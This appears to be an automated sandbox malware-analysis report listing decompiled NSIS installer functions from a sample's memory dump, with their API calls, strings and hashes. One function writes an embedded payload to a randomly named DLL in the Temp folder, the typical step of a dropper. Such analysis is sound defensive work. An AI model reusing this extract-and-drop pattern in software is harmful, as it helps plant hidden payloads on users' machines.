            Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
            Download Yara Rule
            C-Code - Quality: 90%
            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a2f88;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













            0x0040100a
            0x00401039
            0x00401047
            0x0040104d
            0x00401051
            0x0040105b
            0x00401061
            0x00401064
            0x004010f3
            0x00401089
            0x0040108c
            0x004010a6
            0x004010bd
            0x004010cc
            0x004010cf
            0x004010d5
            0x004010d9
            0x004010e4
            0x004010ed
            0x004010ef
            0x004010ef
            0x00401100
            0x00401105
            0x0040110d
            0x00401110
            0x00401112
            0x00401118
            0x0040111f
            0x00401126
            0x00401130
            0x00401142
            0x00401156
            0x00401160
            0x00401165
            0x00401165
            0x00401110
            0x0040116e
            0x00000000
            0x00401178
            0x00401010
            0x00401013
            0x00401015
            0x0040101f
            0x0040101f
            0x00000000

            APIs
            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
            • BeginPaint.USER32(?,?), ref: 00401047
            • GetClientRect.USER32 ref: 0040105B
            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
            • FillRect.USER32 ref: 004010E4
            • DeleteObject.GDI32(?), ref: 004010ED
            • CreateFontIndirectA.GDI32(?), ref: 00401105
            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
            • SelectObject.GDI32(00000000,?), ref: 00401140
            • DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
            • SelectObject.GDI32(00000000,00000000), ref: 00401160
            • DeleteObject.GDI32(?), ref: 00401165
            • EndPaint.USER32(?,?), ref: 0040116E
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
            • String ID: F
            • API String ID: 941294808-1304234792
            • Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
            • Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
            • Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
            • Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004059E1, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 180stringCOMMON
            Download Yara Rule
            C-Code - Quality: 88%
            			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _t35;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				char _t51;
				signed int _t61;
				char* _t62;
				char _t67;
				signed int _t69;
				CHAR* _t79;
				signed int _t86;
				signed int _t88;
				void* _t89;

				_t61 = _a8;
				if(_t61 < 0) {
					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
				}
				_t62 = _t61 +  *0x7a2fb8;
				_t35 = 0x7a1f20;
				_t79 = 0x7a1f20;
				if(_a4 - 0x7a1f20 < 0x800) {
					_t79 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t67 =  *_t62;
					_a11 = _t67;
					if(_t67 == 0) {
						break;
					}
					__eflags = _t79 - _t35 - 0x400;
					if(_t79 - _t35 >= 0x400) {
						break;
					}
					_t62 = _t62 + 1;
					__eflags = _t67 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t79 = _t67;
							_t79 =  &(_t79[1]);
							__eflags = _t79;
						} else {
							 *_t79 =  *_t62;
							_t79 =  &(_t79[1]);
							_t62 = _t62 + 1;
						}
						continue;
					}
					_t37 =  *((char*)(_t62 + 1));
					_t69 =  *_t62;
					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
					_v28 = _t69;
					_v20 = _t37;
					_t70 = _t69 | 0x00008000;
					_t38 = _t37 | 0x00008000;
					_v24 = _t69 | 0x00008000;
					_t62 = _t62 + 2;
					__eflags = _a11 - 0xfe;
					_v16 = _t38;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t38 | 0xffffffff) - _t86;
								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
							}
							L38:
							_t79 =  &(_t79[lstrlenA(_t79)]);
							_t35 = 0x7a1f20;
							continue;
						}
						__eflags = _t86 - 0x1b;
						if(_t86 != 0x1b) {
							__eflags = (_t86 << 0xa) + 0x7a4000;
							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
						} else {
							E0040591D(_t79,  *0x7a2f84);
						}
						__eflags = _t86 + 0xffffffeb - 6;
						if(_t86 + 0xffffffeb < 6) {
							L29:
							E00405BFB(_t79);
						}
						goto L38;
					}
					_a8 = _a8 & 0x00000000;
					 *_t79 =  *_t79 & 0x00000000;
					_t88 = 4;
					__eflags = _v20 - _t88;
					if(_v20 != _t88) {
						_t49 = _v28;
						__eflags = _t49 - 0x2b;
						if(_t49 != 0x2b) {
							__eflags = _t49 - 0x26;
							if(_t49 != 0x26) {
								__eflags = _t49 - 0x25;
								if(_t49 != 0x25) {
									__eflags = _t49 - 0x24;
									if(_t49 != 0x24) {
										goto L19;
									}
									GetWindowsDirectoryA(_t79, 0x400);
									goto L18;
								}
								GetSystemDirectoryA(_t79, 0x400);
								goto L18;
							}
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							E004059BF(_t79, "C:\\Program Files");
							goto L18;
						} else {
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
							L18:
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							goto L19;
						}
					} else {
						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
						L19:
						__eflags =  *0x7a3004;
						if( *0x7a3004 == 0) {
							_t88 = 2;
						}
						do {
							_t88 = _t88 - 1;
							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								 *_t79 =  *_t79 & 0x00000000;
								__eflags =  *_t79;
								goto L25;
							}
							__imp__SHGetPathFromIDListA(_v8, _t79);
							_v12 = _t51;
							E0040521C(_t70, _v8);
							__eflags = _v12;
							if(_v12 != 0) {
								break;
							}
							L25:
							__eflags = _t88;
						} while (_t88 != 0);
						__eflags =  *_t79;
						if( *_t79 != 0) {
							__eflags = _a8;
							if(_a8 != 0) {
								lstrcatA(_t79, _a8);
							}
						}
						goto L29;
					}
				}
				 *_t79 =  *_t79 & 0x00000000;
				if(_a4 == 0) {
					return _t35;
				}
				return E004059BF(_a4, _t35);
			}






















            0x004059e8
            0x004059ef
            0x00405a00
            0x00405a00
            0x00405a0a
            0x00405a0c
            0x00405a13
            0x00405a1b
            0x00405a21
            0x00405a24
            0x00405a24
            0x00405bd5
            0x00405bd5
            0x00405bd9
            0x00405bdc
            0x00000000
            0x00000000
            0x00405a31
            0x00405a37
            0x00000000
            0x00000000
            0x00405a3d
            0x00405a3e
            0x00405a41
            0x00405bc8
            0x00405bd2
            0x00405bd4
            0x00405bd4
            0x00405bca
            0x00405bcc
            0x00405bce
            0x00405bcf
            0x00405bcf
            0x00000000
            0x00405bc8
            0x00405a47
            0x00405a4b
            0x00405a5b
            0x00405a62
            0x00405a65
            0x00405a68
            0x00405a6a
            0x00405a6d
            0x00405a70
            0x00405a71
            0x00405a75
            0x00405a78
            0x00405b73
            0x00405b77
            0x00405ba7
            0x00405bab
            0x00405bb0
            0x00405bb4
            0x00405bb4
            0x00405bb9
            0x00405bbf
            0x00405bc1
            0x00000000
            0x00405bc1
            0x00405b79
            0x00405b7c
            0x00405b91
            0x00405b98
            0x00405b7e
            0x00405b85
            0x00405b85
            0x00405ba0
            0x00405ba3
            0x00405b6b
            0x00405b6c
            0x00405b6c
            0x00000000
            0x00405ba3
            0x00405a7e
            0x00405a82
            0x00405a87
            0x00405a88
            0x00405a8b
            0x00405a96
            0x00405a99
            0x00405a9c
            0x00405ab5
            0x00405ab8
            0x00405ae5
            0x00405ae8
            0x00405af8
            0x00405afb
            0x00000000
            0x00000000
            0x00405b03
            0x00000000
            0x00405b03
            0x00405af0
            0x00000000
            0x00405af0
            0x00405aca
            0x00405acf
            0x00405ad2
            0x00000000
            0x00000000
            0x00405ade
            0x00000000
            0x00405a9e
            0x00405aae
            0x00405b09
            0x00405b09
            0x00405b0c
            0x00000000
            0x00000000
            0x00000000
            0x00405b0c
            0x00405a8d
            0x00405a8d
            0x00405b0e
            0x00405b0e
            0x00405b15
            0x00405b19
            0x00405b19
            0x00405b1a
            0x00405b1d
            0x00405b29
            0x00405b2f
            0x00405b31
            0x00405b50
            0x00405b50
            0x00000000
            0x00405b50
            0x00405b37
            0x00405b40
            0x00405b43
            0x00405b48
            0x00405b4c
            0x00000000
            0x00000000
            0x00405b53
            0x00405b53
            0x00405b53
            0x00405b57
            0x00405b5a
            0x00405b5c
            0x00405b60
            0x00405b66
            0x00405b66
            0x00405b60
            0x00000000
            0x00405b5a
            0x00405a8b
            0x00405be2
            0x00405bec
            0x00405bf8
            0x00405bf8
            0x00000000

            APIs
            • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
            • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
            • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
            • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078ED38,00789938), ref: 00405BBA
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
            • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
            • API String ID: 4227507514-3711765563
            • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
            • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
            • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
            • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100memoryfilestringCOMMON
            Download Yara Rule
            C-Code - Quality: 32%
            			E004026FA() {
				void* _t23;
				void* _t28;
				long _t33;
				struct _OVERLAPPED* _t48;
				void* _t51;
				void* _t53;
				void* _t54;
				CHAR* _t55;
				void* _t58;
				void* _t59;
				void* _t60;

				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
				_t54 = E00402A9A(_t48);
				_t23 = E00405538(_t54);
				_push(_t54);
				if(_t23 == 0) {
					lstrcatA(E004054CC(E004059BF("C:\Users\jones\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll", "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
					_t55 = 0x40a018;
				} else {
					_push(0x40a018);
					E004059BF();
				}
				E00405BFB(_t55);
				_t28 = E00405690(_t55, 0x40000000, 2);
				 *(_t60 + 8) = _t28;
				if(_t28 != 0xffffffff) {
					_t33 =  *0x7a2f8c;
					 *(_t60 - 0x2c) = _t33;
					_t53 = GlobalAlloc(0x40, _t33);
					if(_t53 != _t48) {
						E004030FF(_t48);
						E004030CD(_t53,  *(_t60 - 0x2c));
						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
						 *(_t60 - 0x30) = _t58;
						if(_t58 != _t48) {
							_push( *(_t60 - 0x1c));
							_push(_t58);
							_push(_t48);
							_push( *((intOrPtr*)(_t60 - 0x20)));
							E00402EBD();
							while( *_t58 != _t48) {
								_t59 = _t58 + 8;
								 *(_t60 - 0x38) =  *_t58;
								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
								_t58 = _t59 +  *(_t60 - 0x38);
							}
							GlobalFree( *(_t60 - 0x30));
						}
						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
						GlobalFree(_t53);
						_push(_t48);
						_push(_t48);
						_push( *(_t60 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
					}
					CloseHandle( *(_t60 + 8));
					_t55 = 0x40a018;
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
					_t51 = 0xffffffef;
					DeleteFileA(_t55);
					 *((intOrPtr*)(_t60 - 4)) = 1;
				}
				_push(_t51);
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
				return 0;
			}














            0x004026fb
            0x00402707
            0x0040270a
            0x00402711
            0x00402712
            0x00402737
            0x0040273c
            0x00402714
            0x00402719
            0x0040271a
            0x0040271a
            0x00402742
            0x0040274f
            0x00402757
            0x0040275a
            0x00402760
            0x0040276e
            0x00402773
            0x00402777
            0x0040277a
            0x00402783
            0x0040278f
            0x00402793
            0x00402796
            0x00402798
            0x0040279b
            0x0040279c
            0x0040279d
            0x004027a0
            0x004027bf
            0x004027ac
            0x004027b4
            0x004027b7
            0x004027bc
            0x004027bc
            0x004027c6
            0x004027c6
            0x004027d8
            0x004027df
            0x004027e5
            0x004027e6
            0x004027e7
            0x004027ea
            0x004027f1
            0x004027f1
            0x004027f7
            0x004027fd
            0x004027fd
            0x00402807
            0x00402808
            0x0040280c
            0x0040280e
            0x00402814
            0x00402814
            0x0040281b
            0x004021e8
            0x00402932
            0x0040293e

            APIs
            • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
            • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
            • GlobalFree.KERNEL32 ref: 004027C6
            • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
            • GlobalFree.KERNEL32 ref: 004027DF
            • CloseHandle.KERNEL32(?), ref: 004027F7
            • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll
            • API String ID: 3508600917-1619287098
            • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
            • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
            • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
            • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404D62, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
            Download Yara Rule
            C-Code - Quality: 94%
            			E00404D62(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7a2764;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x4092a0; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
					}
					_t26 = lstrlenA(0x79ed60);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) != 0) {
							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
						}
						if((_v12 & 0x00000002) != 0) {
							_v32 = 0x79ed60;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x79ed60)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x79ed60, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















            0x00404d68
            0x00404d74
            0x00404d77
            0x00404d7d
            0x00404d89
            0x00404d8c
            0x00404d8f
            0x00404d95
            0x00404d95
            0x00404d9b
            0x00404da3
            0x00404da6
            0x00404dc3
            0x00404dc7
            0x00404dd0
            0x00404dd0
            0x00404dda
            0x00404de3
            0x00404def
            0x00404df6
            0x00404dfa
            0x00404dfd
            0x00404e10
            0x00404e1e
            0x00404e1e
            0x00404e22
            0x00404e24
            0x00404e27
            0x00000000
            0x00404e27
            0x00404da8
            0x00404db0
            0x00404db8
            0x00404dbe
            0x00000000
            0x00404dbe
            0x00404db8
            0x00404da6
            0x00404e31

            APIs
            • lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
            • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
            • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
            • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: MessageSend$lstrlen$TextWindowlstrcat
            • String ID: `y
            • API String ID: 2531174081-1740403070
            • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
            • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
            • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
            • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405BFB, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405BFB(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405538(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








            0x00405bfd
            0x00405c05
            0x00405c19
            0x00405c19
            0x00405c1f
            0x00405c2c
            0x00405c2c
            0x00405c2d
            0x00405c2f
            0x00405c33
            0x00405c35
            0x00405c3e
            0x00405c40
            0x00405c5a
            0x00405c62
            0x00405c62
            0x00405c67
            0x00405c69
            0x00405c6b
            0x00405c6f
            0x00405c70
            0x00405c73
            0x00405c7b
            0x00405c7d
            0x00405c81
            0x00000000
            0x00000000
            0x00405c87
            0x00405c8c
            0x00000000
            0x00000000
            0x00000000
            0x00405c8c
            0x00405c91

            APIs
            • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
            • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
            • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
            • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
            • *?|<>/":, xrefs: 00405C43
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Char$Next$Prev
